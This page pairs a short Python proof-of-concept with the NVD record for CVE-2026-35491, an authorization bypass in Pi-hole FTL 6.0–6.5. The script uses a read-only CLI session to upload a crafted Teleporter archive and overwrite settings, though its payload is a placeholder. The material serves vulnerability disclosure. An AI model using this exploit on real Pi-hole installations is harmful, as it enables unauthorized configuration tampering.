CVE-2026-35491

import requests import zipfile import io target_url = "http://pi-hole-local:80" cli_password = "your_cli_password_here" # 1. Authenticate to get a CLI session (Read-only) session = requests.Session() auth_resp = session.post(f"{target_url}/api/auth", json={"password": cli_password}) if auth_resp.status_code != 200: print("[!] Failed to authenticate with CLI password") exit(1) print("[+] CLI Session established successfully") # 2. Create a malicious Teleporter archive (ZIP) # This archive contains configuration files intended to overwrite existing settings zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: # Example: Adding a config file that changes settings # Note: Actual internal filenames depend on Pi-hole's Teleporter structure zf.writestr("etc/pihole/setupVars.conf", "MALICIOUS_CONFIG=true") zip_buffer.seek(0) print("[+] Malicious Teleporter archive created") # 3. Exploit: Upload the archive via /api/teleporter # The vulnerability allows the CLI session to import, which writes to disk files = {'file': ('exploit_teleporter.zip', zip_buffer, 'application/zip')} upload_resp = session.post(f"{target_url}/api/teleporter", files=files) if upload_resp.status_code == 200: print("[+] Exploit successful! Configuration overwritten via Teleporter import.") else: print(f"[-] Exploit failed. Status code: {upload_resp.status_code}")

{"cve": {"id": "CVE-2026-35491", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:27.467", "lastModified": "2026-04-17T19:47:02.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, Pi-hole FTL supports a CLI password feature (webserver.api.cli_pw) that creates “CLI” API sessions intended to be read-only for configuration changes. While /api/config correctly blocks CLI sessions from mutating configuration, /api/teleporter allowed Teleporter imports for CLI sessions, enabling a CLI-scoped session to overwrite configuration via a Teleporter archive (authorization bypass). This vulnerability is fixed in 6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.6", "matchCriteriaId": "B6C2E10B-7CA2-4E8D-A474-B7980BF3FC2C"}]}]}], "references": [{"url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-r7g8-3fj7-m5qq", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}